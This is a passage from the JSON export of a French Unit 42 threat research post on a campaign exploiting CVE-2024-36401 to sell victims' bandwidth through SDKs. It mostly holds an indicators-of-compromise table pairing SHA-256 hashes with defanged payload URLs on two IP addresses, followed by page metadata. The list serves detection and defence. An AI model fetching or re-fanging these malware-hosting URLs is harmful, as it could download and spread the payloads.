monospace;\">8b25144ad17d023f67477be4791db45d9197d7cfb666b3a5ccc1b1c0e4bae3af<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/7kS5qiHwg8\/e102<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">8aafb9965e946e5d4be085a1373abc750a1488ff78e6e082cc36ff20ff328465<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/ei0Ul7l75J\/e193<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">a13a07d15d94c996d8b7e8ed633073f6a3e2268a8d14363f16ad48160b85df08<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/kGQtGhOpCP\/elog<\/span><\/td>\n<\/tr>\n<tr style=\"height: 51px;\">\n<td style=\"height: 51px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">cdae958629383c4dba22a115615d8a63211bbccb06335cd1c4b5e2c2aa3fee77<\/span><\/td>\n<td style=\"height: 51px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/wHNOFLazdK\/glog (from d401)<\/span><\/td>\n<\/tr>\n<tr style=\"height: 51px;\">\n<td style=\"height: 51px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">bbdda70f0c4a3de4ec955e134ad46895ac931e21b930837a85633277128ab7d2<\/span><\/td>\n<td style=\"height: 51px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/wlLiXFNtjU\/hlog (from c401)<\/span><\/td>\n<\/tr>\n<tr style=\"height: 51px;\">\n<td style=\"height: 51px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">4fd789a19db35e054a5135466d610452bea607a11b7ec765b5474847c22e637c<\/span><\/td>\n<td style=\"height: 51px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/gmhm4lmSLO\/plog (from z401)<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">43b49294b778d4489c69922ff3aca27964a04e0f08bcc830108dc83261a0b205<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/QF8plwpY8Y\/s401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">ae706c149497c2fc809682e8827996ea3ceb7bcecddd87be7543d1dca4853470<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/zJ03zmSrz6\/s402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">3fd7794be80782b11a09f51ac8cbf2147e9d79303923f279d610ee45e12506eb<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/22mINruojN\/s593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 51px;\">\n<td style=\"height: 51px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">e25d6134c6a0573ded1d340f609dd71d15934ca165ea79d47898aa37a5185415<\/span><\/td>\n<td style=\"height: 51px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/3pHrSu54Pf\/slog (from s401)<\/span><\/td>\n<\/tr>\n<tr style=\"height: 51px;\">\n<td style=\"height: 51px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">085da541d7555ac6afcacd5899027c3fa4132c1eccfb3d8223794c4e0e3eb361<\/span><\/td>\n<td style=\"height: 51px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/vPN5rgRMTz\/wlog (from a401)<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">2aa6f95dbe8d17e8e70db677808c96ee956c36b7cc8f274435173cfed0b1f5af<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/T8VevroEJT\/z401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">2b176eb8afa0b089ee8fb072c68c6fdcfe4b2f034c776cc32064f26c0e6c69a3<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/uCX4Nl2Pwu\/z402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">915d1bb1000a8726df87e0b15bea77c5476e3ec13c8765b43781d5935f1d2609<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/3twwHaJzxo\/z593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">fa2687f94955fbdc2c41f1cff8c7df24937aeb942e4d7856bf2ff52ebf2e61aa<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/MFTYFuqKGU\/a401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">663970530e764f91b0be43936331e6c0a93610db6b86c6c4b64de270ae4d4630<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/cxtpjeM3KU\/a402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">e0b886a39cf098a3c7daa021c7af022b0ceb6edcf3fa49e3c3b8f70b843423c2<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/XEQS3MTzdS\/a593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">9515df36a6d16c0a9fcca680d6b181539d80efd4cda85dacbfb30127a7f11736<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/fAFUQgw7Py\/c401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">491f5af9d29f52a6df026159a8ebd27ee6e27151ea78c4782eb05b2c5d39bfc3<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/0rX20C97S6\/c402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">b381e8355cf3a432e63064897cc7719e8b9c38e91c6151cd1e7aed4cd219a75b<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/LuoHgydq6F\/c593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">dec84a568b6393ccd863bb38851a76f54de6f59193660e4b88aa1f941b744469<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/g1Gl1JWEUw\/d401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">33aad585d6280d1921b5f46f8894ee05d426c7751c2133ed5484bf65af587576<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/AORGz7zIzn\/d402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">7620f22a5ed1a8ac2a1da732e55e14a13197b631e5abba6431f88e5cfa3ae2de<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/rKS64mUmF7\/d593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">3d7ac752bb0d54802f2def38f44e10854f70ab5a9a001b5c39ab0531b9ed74bf<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/vbbdG8dpAw\/s401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">ae706c149497c2fc809682e8827996ea3ceb7bcecddd87be7543d1dca4853470<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/W7lJoMcuOu\/s402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">6dd6751bae92dfa504f0ad5558ab8adfdfba3df5a7f218245627574bfac39f11<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/6mXfFz7ltE\/s593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">357ca4ad31132ad4bd605e3217968819b04d577884a4e9dd760ed0182c4609ed<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/YbEYCqCFVl\/z401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">2b176eb8afa0b089ee8fb072c68c6fdcfe4b2f034c776cc32064f26c0e6c69a3<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/1Vt9KBLEFr\/z402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">97c8ec63766ce63b8ace283928922cfceb7c8f3bc72edcbd255e157a1afb15fe<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/09KvYAUSHm\/z593<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><a id=\"post-156324-_heading=h.153je835sin4\"><\/a>Pour aller plus loin<\/h2>\n<ul>\n<li><a href=\"https:\/\/commons.apache.org\/proper\/commons-jxpath\/\" target=\"_blank\" rel=\"noopener\">Le composant\u00a0JXPath<\/a> \u2013\u00a0Apache\u00a0Commons<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.<\/p>\n","protected":false},"author":278,"featured_media":152575,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[8832,8850],"tags":[9516],"product_categories":[8956,8965,8973,8979,8955,9041,9077,9151],"coauthors":[836,3736,3549,2070],"class_list":["post-156324","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-threat-research-fr","category-vulnerabilities-fr","tag-cve-2024-36401-fr","product_categories-advanced-dns-security-fr","product_categories-advanced-threat-prevention-fr","product_categories-advanced-url-filtering-fr","product_categories-advanced-wildfire-fr","product_categories-cloud-delivered-security-services-fr","product_categories-cortex-fr","product_categories-cortex-xpanse-fr","product_categories-unit-42-incident-response-fr"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante<\/title>\n<meta name=\"description\" content=\"Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante\" \/>\n<meta property=\"og:description\" content=\"Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-21T14:53:32+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-10T15:37:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Zhibin Zhang, Yiheng An, Chao Lei, Haozhe Zhang\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante","description":"Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/","og_locale":"fr_FR","og_type":"article","og_title":"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante","og_description":"Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.","og_url":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/","og_site_name":"Unit 42","article_published_time":"2025-08-21T14:53:32+00:00","article_modified_time":"2025-09-10T15:37:33+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg","type":"image\/jpeg"}],"author":"Zhibin Zhang, Yiheng An, Chao Lei, Haozhe Zhang","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/"},"author":{"name":"Zhibin Zhang","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/ef2736b38e39c269e59b3d79094883da"},"headline":"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante","datePublished":"2025-08-21T14:53:32+00:00","dateModified":"2025-09-10T15:37:33+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/"},"wordCount":4023,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg","keywords":["CVE-2024-36401"],"articleSection":["Recherche sur les menaces","Vuln\u00e9rabilit\u00e9s"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/","url":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/","name":"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg","datePublished":"2025-08-21T14:53:32+00:00","dateModified":"2025-09-10T15:37:33+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/ef2736b38e39c269e59b3d79094883da"},"description":"Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg","width":1920,"height":900,"caption":"Pictorial representation of CVE-2024-36401. Digital illustration of a map of North America with interconnected glowing lines and dots symbolizing network connections across the continent."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/"},{"@type":"ListItem","position":2,"name":"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/ef2736b38e39c269e59b3d79094883da","name":"Zhibin Zhang","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Zhibin Zhang"},"url":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/author\/zhibin-zhang\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/156324","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/users\/278"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/comments?post=156324"}],"version-history":[{"count":1,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/156324\/revisions"}],"predecessor-version":[{"id":156503,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/156324\/revisions\/156503"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/media\/152575"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/media?parent=156324"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/categories?post=156324"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/tags?post=156324"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/product_categories?post=156324"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/coauthors?post=156324"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}